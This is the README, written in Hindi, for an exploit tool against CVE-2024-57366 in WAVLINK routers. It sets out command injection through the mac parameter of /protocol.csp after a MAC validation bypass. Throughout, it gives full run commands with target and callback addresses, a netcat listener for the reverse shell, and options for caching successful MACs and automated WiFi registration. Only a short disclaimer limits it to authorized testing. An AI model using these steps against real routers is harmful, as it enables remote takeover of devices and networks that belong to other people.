
CVE-2024-57366 के लिए रिमोट कोड निष्पादन एक्सप्लॉइट जो WAVLINK राउटरों को MAC एड्रेस सत्यापन बायपास और कमांड इंजेक्शन के माध्यम से लक्षित करता है, जिसमें स्वचालित WiFi पंजीकरण और रिवर्स शेल पेलोड डिलीवरी शामिल है।
CVE-2024-57366 के लिए एक मजबूत एक्सप्लॉइट जो MAC पता सत्यापन बाईपास और कमांड इंजेक्शन के माध्यम से कमजोर राउटर पर रिमोट कोड निष्पादन की अनुमति देता है।
यह एक पोस्ट-ऑथराइज़ेशन एक्सप्लॉइट है जिसके लिए राउटर की "रिमोट कंट्रोल" सुविधा चालू होनी चाहिए, और प्रशासनिक पासवर्ड आवश्यक है। प्रशासनिक उपयोगकर्ता नाम "admin" पर हार्डकोड किया गया है।
sudo पहुंच (नेटवर्क इंटरफ़ेस प्रबंधन के लिए आवश्यक)pip3 install requests
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# स्क्रिप्ट पूछेगी: "Use cached MAC for quick exploit? (y/n):" - "y" कहें
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full
python3 exploit.py --list-cached
--target - लक्ष्य राउटर IP पता (डिफ़ॉल्ट: 127.0.0.1)--port - लक्ष्य राउटर पोर्ट (डिफ़ॉल्ट: 80)--local-ip - रिवर्स शेल कॉलबैक के लिए आपका स्थानीय IP पता--local-port - रिवर्स शेल कॉलबैक के लिए स्थानीय पोर्ट (डिफ़ॉल्ट: 4444)--password - राउटर व्यवस्थापक पासवर्ड--ssid - WiFi नेटवर्क नाम (डिफ़ॉल्ट: WAVLINK-Mesh_DC4B)--force-full - पूर्ण एक्सप्लॉइट बलपूर्वक करें, कैश की गई MAC जाँच छोड़ें--list-cached - कैश की गई MAC पतों की सूची दिखाएँ और बाहर निकलेंCVE-2024-57366 राउटर फर्मवेयर में MAC पता सत्यापन बाईपास का शोषण करता है। यह भेद्यता /protocol.csp एंडपॉइंट में mac पैरामीटर के माध्यम से कमांड इंजेक्शन की अनुमति देती है।
eth0 इंटरफ़ेस का उपयोग करता हैindex=1, URL पथ में टोकन)एक्सप्लॉइट स्वचालित रूप से सफल MAC पतों को successful_macs.txt में कैश करता है:
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here
32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08
मैन्युअल MAC जोड़ना: successful_macs.txt संपादित करें और इस प्रकार पंक्तियाँ जोड़ें:
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08
# netcat लिसनर शुरू करें
nc -lvp 4444
# एक्सप्लॉइट चलाएँ
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# जब MAC पता सहेजने के लिए कहा जाए, तो "y" कहें
# netcat लिसनर शुरू करें
nc -lvp 4444
# एक्सप्लॉइट चलाएँ (कैश की गई MAC का उपयोग करेगा)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# जब कैश की गई MAC के बारे में पूछा जाए, तो "y" कहें
"कोई वायरलेस एडाप्टर नहीं मिला"
sudo के साथ चलाने का प्रयास करें"MAC पता सत्यापन विफल"
"अनुरोध समय समाप्त"
"रिवर्स शेल कनेक्ट नहीं हो रहा"
--local-ip सही है (ip addr show eth0 का उपयोग करें)CVE-2024-57366/
├── exploit.py # Main exploit script
├── successful_macs.txt # MAC address cache (auto-generated)
└── README.md # This file
यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है। लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं।
/protocol.csp एंडपॉइंट के माध्यम से कमांड इंजेक्शनयह परियोजना शैक्षिक उद्देश्यों के लिए यथावत प्रदान की गई है। लागू कानूनों और विनियमों के अनुसार जिम्मेदारी से उपयोग करें।